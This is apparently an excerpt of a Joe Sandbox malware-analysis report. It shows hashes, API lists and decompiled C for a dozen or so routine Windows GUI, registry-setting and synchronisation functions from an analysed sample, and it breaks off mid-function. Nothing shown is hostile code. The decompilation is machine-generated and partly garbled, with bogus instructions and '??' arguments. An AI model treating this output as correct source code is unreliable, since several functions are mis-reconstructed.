Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58

Uniqueness

Uniqueness Score: -1.00%

Function 00428D0F, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00428D0F(intOrPtr* __ecx, int _a4) {
				struct HDC__* _t8;
				int _t16;
				void* _t18;
				void* _t21;
				intOrPtr* _t22;

				_t16 = _a4;
				_t22 = __ecx;
				_t21 = GetStockObject(_t16);
				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
					_t8 =  *(_t22 + 4);
					if(_t8 != 0) {
						SelectObject(_t8, _t21);
					}
					_push(SelectObject( *(_t22 + 8), _t21));
					return E0041A5FC();
				} else {
					_push(SelectObject( *(_t22 + 8), _t21));
					_t18 = E0041A5FC();
					if( *(_t22 + 0x2c) != _t21) {
						 *(_t22 + 0x2c) = _t21;
						E00428D7F(_t22);
					}
					return _t18;
				}
			}

0x00428d10
0x00428d16
0x00428d22
0x00428d24
0x00428d5c
0x00428d67
0x00428d6b
0x00428d6b
0x00428d73
0x00000000
0x00428d35
0x00428d3f
0x00428d48
0x00428d4a
0x00428d52
0x00428d55
0x00428d55
0x00000000
0x00428d4c

APIs

GetStockObject.GDI32(?), ref: 00428D19
SelectObject.GDI32(?,00000000), ref: 00428D39
SelectObject.GDI32(?,00000000), ref: 00428D6B
SelectObject.GDI32(?,00000000), ref: 00428D71

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004253EE, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x004253f2
0x004253ff
0x0042544f
0x00425458
0x00425461
0x00425467
0x0042546a
0x00000000
0x0042546a
0x00425420
0x0042543a
0x00000000

APIs

IsWindow.USER32(0000E800), ref: 004253F7
SendMessageA.USER32(0000E800,00000420,00000000,?), ref: 00425420
SendMessageA.USER32(0000E800,0000041F,00000000,?), ref: 0042543A
InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E24C, Relevance: 6.0, APIs: 4, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, "%d", _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E00425E7D(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}

0x0041e253
0x0041e259
0x0041e29d
0x00000000
0x0041e2b6
0x0041e25e
0x0041e263
0x0041e267
0x0041e278
0x0041e281
0x00000000
0x0041e28e
0x0041e2be

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
wsprintfA.USER32 ref: 0041E29D
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00424F9B, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E0041F52D(__ecx, _t19, _a8);
				_t12 = E00416528(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x00424fa2
0x00424fa6
0x00424fac
0x00424fb3
0x00424fbb
0x00424fc7
0x00424fcf
0x00424fe1
0x00424fef
0x00424ffd
0x00425002
0x00000000
0x00425002
0x00424fcf
0x00425008

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(0000E800), ref: 00424FC0
IsZoomed.USER32(00000000), ref: 00424FC7
GetSystemMetrics.USER32 ref: 00424FEF
GetSystemMetrics.USER32 ref: 00424FFD

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3C9, Relevance: 6.0, APIs: 4, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040E3C9(void* __ecx) {
				long _t1;
				long _t3;
				long _t8;
				void* _t9;

				_t1 =  *0x43a478; // 0x2
				_t9 = __ecx;
				_t8 = 2;
				if(_t1 != _t8) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x43a478 - 1;
							if( *0x43a478 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x43a478 - _t8; // 0x2
						if(__eflags != 0) {
							L12:
							return _t9;
						}
						L10:
						_push(0x43a460);
						L11:
						EnterCriticalSection();
						goto L12;
					}
					_t3 = InterlockedExchange(0x43a478, 1);
					__eflags = _t3;
					if(__eflags != 0) {
						__eflags = _t3 - _t8;
						if(_t3 == _t8) {
							 *0x43a478 = _t8;
						}
						goto L7;
					}
					InitializeCriticalSection(0x43a460);
					E00405626(__eflags, E0040E447);
					 *0x43a478 = _t8;
					goto L10;
				}
				_push(0x43a460);
				goto L11;
			}

0x0040e3c9
0x0040e3d3
0x0040e3d5
0x0040e3d8
0x0040e3e1
0x0040e3e8
0x0040e41f
0x0040e41f
0x0040e41f
0x0040e426
0x00000000
0x00000000
0x0040e42a
0x0040e42a
0x0040e432
0x0040e438
0x0040e441
0x0040e446
0x0040e446
0x0040e43a
0x0040e43a
0x0040e43b
0x0040e43b
0x00000000
0x0040e43b
0x0040e3f1
0x0040e3f7
0x0040e3f9
0x0040e415
0x0040e417
0x0040e419
0x0040e419
0x00000000
0x0040e417
0x0040e3fc
0x0040e407
0x0040e40d
0x00000000
0x0040e40d
0x0040e3da
0x00000000

APIs

InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E

Uniqueness

Uniqueness Score: -1.00%

Function 0042146D, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042146D(void* __ecx, void* _a4) {
				int _v8;
				char _v268;
				void* __ebp;
				void* _t15;
				int _t19;
				intOrPtr* _t23;
				void* _t25;

				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
				_t19 = 0;
				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t15 = E00424BFB();
				_t23 =  *((intOrPtr*)(_t15 + 4));
				if(_v8 > 0) {
					do {
						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
						_t19 = _t19 + 1;
					} while (_t19 < _v8);
				}
				DragFinish(_a4);
				return _t15;
			}

0x00421483
0x0042148e
0x00421499
0x0042149c
0x004214a4
0x004214a7
0x004214a9
0x004214b9
0x004214c6
0x004214c9
0x004214ca
0x004214a9
0x004214d2
0x004214dc

APIs

SetActiveWindow.USER32(?), ref: 0042147C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
DragFinish.SHELL32(?), ref: 004214D2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004159DA, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

0x004159e4
0x00415a49
0x00000000
0x004159ec
0x004159ec
0x004159f2
0x00000000
0x00415a0f
0x00415a18
0x00415a24
0x00415a2a
0x00415a30
0x00415a34
0x00415a34
0x00415a3e
0x00415a46
0x00000000
0x00415a46
0x004159f2

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
SetBkColor.GDI32(00000000,00000000), ref: 00415A24
GetSysColor.USER32(00000008), ref: 00415A34
SetTextColor.GDI32(00000000,?), ref: 00415A3E

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99

Uniqueness

Uniqueness Score: -1.00%

Function 00423A6F, Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00423A6F(void* __ecx) {
				void* __esi;
				void* _t16;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				E00406520(E0042A9EC, _t30);
				_push(__ecx);
				_push(__ecx);
				_t34 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_t28 = __ecx;
				if(_t34 == 0) {
					 *((intOrPtr*)(_t30 - 4)) = 0;
					if( *(_t30 + 0xc) != 0) {
						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
					} else {
						E00416A77(__ecx + 0xc8, __ecx);
					}
					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
					_t16 = 1;
				} else {
					_t16 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

0x00423a74
0x00423a79
0x00423a7a
0x00423a80
0x00423a86
0x00423a89
0x00423a8b
0x00423a97
0x00423a9a
0x00423ac2
0x00423a9c
0x00423aa2
0x00423aa2
0x00423ad2
0x00423ada
0x00423a8d
0x00423a8d
0x00423a8d
0x00423aea
0x00423af3

APIs

__EH_prolog.LIBCMT ref: 00423A74
SendMessageA.USER32(?,00000085,00000000,00000000), ref: 00423AD2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004297EF, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004297EF(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E004298F1(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}

0x004297f8
0x004297fd
0x0042980a
0x00429816
0x00429821
0x00429824
0x00429832
0x0042983f
0x00000000
0x00429850
0x00429858

APIs

GetViewportOrgEx.GDI32(?,?), ref: 0042980A

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
GetWindowOrgEx.GDI32(?,?), ref: 0042983F
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00423946, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
				int _t13;
				int _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t24;

				asm("pushfd");
				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_t20 = E00416528(_t18);
					if((_t20 & 0x00040600) == 0) {
						_push(GetSystemMetrics(6));
						_push(5);
					} else {
						_push(GetSystemMetrics(0x21));
						_push(0x20);
					}
					_t13 = GetSystemMetrics();
					_t24 = _a5;
					_t14 = InflateRect(_t24, _t13, ??);
					if((_t20 & 0x00c00000) != 0) {
						_t14 =  *0x439c9c; // 0x0
						_t24->top = _t24->top - _t14;
					}
				} else {
					_t14 = E00415361(_t18, _a5, _a9);
				}
				return _t14;
			}

0x00423947
0x00423949
0x0042394c
0x00423963
0x0042396b
0x00423986
0x00423987
0x0042396d
0x00423977
0x00423978
0x00423978
0x00423989
0x0042398b
0x00423991
0x0042399e
0x004239a0
0x004239a5
0x004239a5
0x0042394e
0x00423956
0x00423956
0x004239a9

APIs

GetSystemMetrics.USER32 ref: 00423975
GetSystemMetrics.USER32 ref: 00423989
InflateRect.USER32(?,00000000), ref: 00423991

Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00422D9C, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00422D9C(struct tagRECT* _a8) {
				signed int _t11;
				int _t13;
				intOrPtr _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t23;

				if( *0x439c44 != 0) {
					return E004136A7(_t18);
				}
				_t20 = E00416528(_t18);
				if((_t20 & 0x00040600) == 0) {
					_push( ~(GetSystemMetrics(6)));
					_push(5);
				} else {
					_push( ~(GetSystemMetrics(0x21)));
					_push(0x20);
				}
				_t11 = GetSystemMetrics();
				_t23 = _a8;
				_t13 = InflateRect(_t23,  ~_t11, ??);
				if((_t20 & 0x00c00000) != 0) {
					_t14 =  *0x439c9c; // 0x0
					_t23->top = _t23->top + _t14;
					return _t14;
				}
				return _t13;
			}

0x00422da4
0x00000000
0x00422da6
0x00422db3
0x00422dbb
0x00422dda
0x00422ddb
0x00422dbd
0x00422dc9
0x00422dca
0x00422dca
0x00422ddd
0x00422ddf
0x00422de7
0x00422df4
0x00422df6
0x00422dfb
0x00000000
0x00422dfb
0x00422dff

APIs

GetSystemMetrics.USER32 ref: 00422DC5
GetSystemMetrics.USER32 ref: 00422DDD
InflateRect.USER32(?,00000000), ref: 00422DE7

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A843, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A843(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				int _t14;
				int _t15;

				_t15 = lstrlenA(_a8);
